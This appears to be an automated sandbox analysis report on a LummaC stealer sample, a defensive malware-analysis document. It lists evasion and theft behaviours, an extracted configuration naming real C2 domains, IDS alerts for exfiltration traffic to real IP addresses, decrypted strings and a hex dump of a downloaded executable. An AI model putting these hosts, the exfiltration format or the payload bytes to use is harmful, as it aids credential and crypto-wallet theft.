Edit tour

Windows Analysis Report
TTsfmr1RWm.exe

Overview

General Information

Sample name:	TTsfmr1RWm.exe renamed because original name is a hash value
Original sample name:	a2e3e7417756b4b817f2fbca4c98ec6e.exe
Analysis ID:	1580869
MD5:	a2e3e7417756b4b817f2fbca4c98ec6e
SHA1:	d5b13886bab879bad11c757c9ca67169ea6a367c
SHA256:	f01386882849a80e799cdf7e4cb04708b1accb80c91687b55f63eed8729d2057
Tags:	exeuser-abuse_ch
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

LummaC encrypted strings found

Machine Learning detection for sample

PE file contains section with special chars

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Downloads executable code via HTTP

Entry point lies outside standard sections

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

TTsfmr1RWm.exe (PID: 6844 cmdline: "C:\Users\user\Desktop\TTsfmr1RWm.exe" MD5: A2E3E7417756B4B817F2FBCA4C98EC6E)

chrome.exe (PID: 1968 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=TTsfmr1RWm.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

chrome.exe (PID: 5892 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2140 --field-trial-handle=2052,i,2643484454984421268,17398489647533980506,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

chrome.exe (PID: 7720 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=TTsfmr1RWm.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

chrome.exe (PID: 7904 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1800 --field-trial-handle=1932,i,6243426754934364140,9618148067064436805,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["hummskitnj.buzz", "inherineau.buzz", "rebuildeso.buzz", "mindhandru.buzz", "scentniej.buzz", "screwamusresz.buzz", "cashfuzysao.buzz", "appliacnesot.buzz", "prisonyfork.buzz"], "Build id": "LOGS11--LiveTraffic"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000003.2375404477.0000000001327000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.2375508681.0000000001333000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.2375441101.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: TTsfmr1RWm.exe PID: 6844	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: TTsfmr1RWm.exe PID: 6844	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: TTsfmr1RWm.exe PID: 6844	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Process Memory Space: TTsfmr1RWm.exe PID: 6844	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 3 entries

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-26T12:41:16.727748+0100	2028371	3	Unknown Traffic	192.168.2.6	49724	104.21.11.101	443	TCP
2024-12-26T12:41:18.877814+0100	2028371	3	Unknown Traffic	192.168.2.6	49725	104.21.11.101	443	TCP
2024-12-26T12:41:21.372815+0100	2028371	3	Unknown Traffic	192.168.2.6	49732	104.21.11.101	443	TCP
2024-12-26T12:41:23.853267+0100	2028371	3	Unknown Traffic	192.168.2.6	49743	104.21.11.101	443	TCP
2024-12-26T12:41:26.348435+0100	2028371	3	Unknown Traffic	192.168.2.6	49749	104.21.11.101	443	TCP
2024-12-26T12:41:29.379620+0100	2028371	3	Unknown Traffic	192.168.2.6	49755	104.21.11.101	443	TCP
2024-12-26T12:41:31.974972+0100	2028371	3	Unknown Traffic	192.168.2.6	49763	104.21.11.101	443	TCP
2024-12-26T12:41:37.155820+0100	2028371	3	Unknown Traffic	192.168.2.6	49777	104.21.11.101	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-26T12:41:17.492444+0100	2054653	1	A Network Trojan was detected	192.168.2.6	49724	104.21.11.101	443	TCP
2024-12-26T12:41:19.673938+0100	2054653	1	A Network Trojan was detected	192.168.2.6	49725	104.21.11.101	443	TCP
2024-12-26T12:41:37.922379+0100	2054653	1	A Network Trojan was detected	192.168.2.6	49777	104.21.11.101	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-26T12:41:17.492444+0100	2049836	1	A Network Trojan was detected	192.168.2.6	49724	104.21.11.101	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-26T12:41:19.673938+0100	2049812	1	A Network Trojan was detected	192.168.2.6	49725	104.21.11.101	443	TCP

ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-26T12:41:40.193540+0100	2019714	2	Potentially Bad Traffic	192.168.2.6	49784	185.215.113.16	80	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-26T12:41:30.160370+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.6	49755	104.21.11.101	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: TTsfmr1RWm.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://mindhandru.buzz:443/api	Avira URL Cloud: Label: malware
Source: https://mindhandru.buzz/api	Avira URL Cloud: Label: malware

Found malware configuration

Source: TTsfmr1RWm.exe.6844.0.memstrmin

Malware Configuration Extractor: LummaC {"C2 url": ["hummskitnj.buzz", "inherineau.buzz", "rebuildeso.buzz", "mindhandru.buzz", "scentniej.buzz", "screwamusresz.buzz", "cashfuzysao.buzz", "appliacnesot.buzz", "prisonyfork.buzz"], "Build id": "LOGS11--LiveTraffic"}

Multi AV Scanner detection for submitted file

Source: TTsfmr1RWm.exe	Virustotal: Detection: 52%			Perma Link
Source: TTsfmr1RWm.exe	ReversingLabs: Detection: 55%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: TTsfmr1RWm.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000000.00000003.2241473757.0000000005010000.00000004.00001000.00020000.00000000.sdmp	String decryptor: hummskitnj.buzz
Source: 00000000.00000003.2241473757.0000000005010000.00000004.00001000.00020000.00000000.sdmp	String decryptor: cashfuzysao.buzz
Source: 00000000.00000003.2241473757.0000000005010000.00000004.00001000.00020000.00000000.sdmp	String decryptor: appliacnesot.buzz
Source: 00000000.00000003.2241473757.0000000005010000.00000004.00001000.00020000.00000000.sdmp	String decryptor: screwamusresz.buzz
Source: 00000000.00000003.2241473757.0000000005010000.00000004.00001000.00020000.00000000.sdmp	String decryptor: inherineau.buzz
Source: 00000000.00000003.2241473757.0000000005010000.00000004.00001000.00020000.00000000.sdmp	String decryptor: scentniej.buzz
Source: 00000000.00000003.2241473757.0000000005010000.00000004.00001000.00020000.00000000.sdmp	String decryptor: rebuildeso.buzz
Source: 00000000.00000003.2241473757.0000000005010000.00000004.00001000.00020000.00000000.sdmp	String decryptor: prisonyfork.buzz
Source: 00000000.00000003.2241473757.0000000005010000.00000004.00001000.00020000.00000000.sdmp	String decryptor: mindhandru.buzz
Source: 00000000.00000003.2241473757.0000000005010000.00000004.00001000.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000003.2241473757.0000000005010000.00000004.00001000.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000000.00000003.2241473757.0000000005010000.00000004.00001000.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000000.00000003.2241473757.0000000005010000.00000004.00001000.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000000.00000003.2241473757.0000000005010000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000000.00000003.2241473757.0000000005010000.00000004.00001000.00020000.00000000.sdmp	String decryptor: LOGS11--LiveTraffic

Source: C:\Users\user\Desktop\TTsfmr1RWm.exe

Code function: 0_2_009458D5 CryptUnprotectData,

0_2_009458D5

Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=TTsfmr1RWm.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0	HTTP Parser: No favicon
Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=TTsfmr1RWm.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0	HTTP Parser: No favicon
Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=TTsfmr1RWm.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0	HTTP Parser: No favicon
Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=TTsfmr1RWm.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0	HTTP Parser: No favicon
Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=TTsfmr1RWm.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0	HTTP Parser: No favicon

Source: TTsfmr1RWm.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 20.198.119.84:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.6:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.6:49725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.6:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.198.119.84:443 -> 192.168.2.6:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.6:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.6:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.6:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.6:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.6:49763 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.198.119.84:443 -> 192.168.2.6:49776 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.6:49777 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.198.119.84:443 -> 192.168.2.6:49838 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.198.119.84:443 -> 192.168.2.6:49987 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.198.119.84:443 -> 192.168.2.6:50071 version: TLS 1.2

Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_00951A10
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 4x nop then movzx ecx, byte ptr [edx+eax]	0_2_00953B50
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h	0_2_00970340
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 4x nop then mov byte ptr [ebx], al	0_2_0095D34A
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 4x nop then mov eax, ebx	0_2_00957440
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+09AD4080h]	0_2_00957440
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 4x nop then mov edi, dword ptr [esi+30h]	0_2_0093CC7A
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-16h]	0_2_00970D20
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 4x nop then mov edx, ebx	0_2_00938600
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 4x nop then mov ecx, eax	0_2_00952E6D
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 4x nop then jmp edx	0_2_00952E6D
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 4x nop then movzx ecx, byte ptr [edx+eax]	0_2_00952E6D
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-16h]	0_2_00971720
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 4x nop then mov byte ptr [ebx], al	0_2_0095C09E
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 4x nop then mov eax, ebx	0_2_0094C8A0
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-000000BEh]	0_2_0094C8A0
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+edx+0Ah]	0_2_0094C8A0
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-2E3D7ACEh]	0_2_0094C8A0
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 4x nop then mov ecx, eax	0_2_0094D8AC
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 4x nop then mov ecx, eax	0_2_0094D8AC
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 4x nop then mov esi, ecx	0_2_009590D0
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 4x nop then mov ecx, eax	0_2_0094D8D8
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 4x nop then mov ecx, eax	0_2_0094D8D8
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 4x nop then mov byte ptr [ebx], al	0_2_0095E0DA
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 4x nop then mov edx, ecx	0_2_0094B8F6
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 4x nop then mov edx, ecx	0_2_0094B8F6
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 4x nop then mov byte ptr [ebx], al	0_2_0095C0E6
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 4x nop then push esi	0_2_0093C805
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	0_2_00952830
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+04h]	0_2_0096C830
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_0095C850
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h	0_2_0096C990
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_0095B980
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 4x nop then jmp edx	0_2_009539B9
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 4x nop then movzx ecx, byte ptr [edx+eax]	0_2_009539B9
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	0_2_009581CC
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	0_2_009589E9
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 4x nop then mov ecx, eax	0_2_0095D116
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 4x nop then mov byte ptr [ebx], al	0_2_0095C09E
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h	0_2_0095B170
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 4x nop then mov ecx, eax	0_2_0095D17D
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx-16h]	0_2_00971160
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 4x nop then mov eax, dword ptr [00976130h]	0_2_00948169
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	0_2_0095AAC0
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	0_2_00966210
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 4x nop then lea esi, dword ptr [eax+00000270h]	0_2_00938A50
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 4x nop then cmp dword ptr [ecx+ebx*8], 385488F2h	0_2_0096CA40
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-6E2DD57Fh]	0_2_0094EB80
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	0_2_009373D0
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	0_2_009373D0
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	0_2_009583D8
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 4x nop then mov edx, ecx	0_2_00948B1B
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 4x nop then mov ecx, eax	0_2_0094C300
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+0Ah]	0_2_0093AB40
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	0_2_00944CA0
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_0094747D
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 4x nop then mov word ptr [edx], di	0_2_0094747D
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 4x nop then movzx edx, byte ptr [eax+edi-74D5A7FEh]	0_2_0095C465
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 4x nop then mov byte ptr [ebx], al	0_2_0095C465
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 4x nop then mov edi, ecx	0_2_0095A5B6
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 4x nop then movzx esi, byte ptr [ebp+eax-46h]	0_2_0096EDC1
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 2213E57Fh	0_2_0096CDF0
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx-3ECB279Fh]	0_2_0096CDF0
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 2213E57Fh	0_2_0096CDF0
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 7F7BECC6h	0_2_0096CDF0
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 4x nop then mov byte ptr [ebx], al	0_2_0095DDFF
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 4x nop then mov edx, ecx	0_2_00956D2E
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	0_2_00958528
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 4x nop then dec edx	0_2_0096FD70
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 4x nop then movzx ecx, byte ptr [esi+eax+61765397h]	0_2_0094B57D
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 4x nop then mov edx, ecx	0_2_00959E80
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-16h]	0_2_009706F0
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 4x nop then mov byte ptr [ebx], al	0_2_0095DE07
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 4x nop then dec edx	0_2_0096FE00
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 4x nop then mov dword ptr [esp+20h], eax	0_2_00939780
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 4x nop then jmp edx	0_2_009537D6
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 4x nop then mov ecx, eax	0_2_0095BF13
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 4x nop then mov edi, dword ptr [esp+28h]	0_2_00955F1B
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 4x nop then jmp eax	0_2_00959739
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_00946F52
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+20h]	0_2_00957740

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49725 -> 104.21.11.101:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49725 -> 104.21.11.101:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49724 -> 104.21.11.101:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49724 -> 104.21.11.101:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49755 -> 104.21.11.101:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49777 -> 104.21.11.101:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: hummskitnj.buzz
Source: Malware configuration extractor	URLs: inherineau.buzz
Source: Malware configuration extractor	URLs: rebuildeso.buzz
Source: Malware configuration extractor	URLs: mindhandru.buzz
Source: Malware configuration extractor	URLs: scentniej.buzz
Source: Malware configuration extractor	URLs: screwamusresz.buzz
Source: Malware configuration extractor	URLs: cashfuzysao.buzz
Source: Malware configuration extractor	URLs: appliacnesot.buzz
Source: Malware configuration extractor	URLs: prisonyfork.buzz

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 26 Dec 2024 11:41:39 GMTContent-Type: application/octet-streamContent-Length: 2801664Last-Modified: Thu, 26 Dec 2024 11:19:36 GMTConnection: keep-aliveETag: "676d3bc8-2ac000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 00 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 2b 00 00 04 00 00 c5 4d 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 44 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 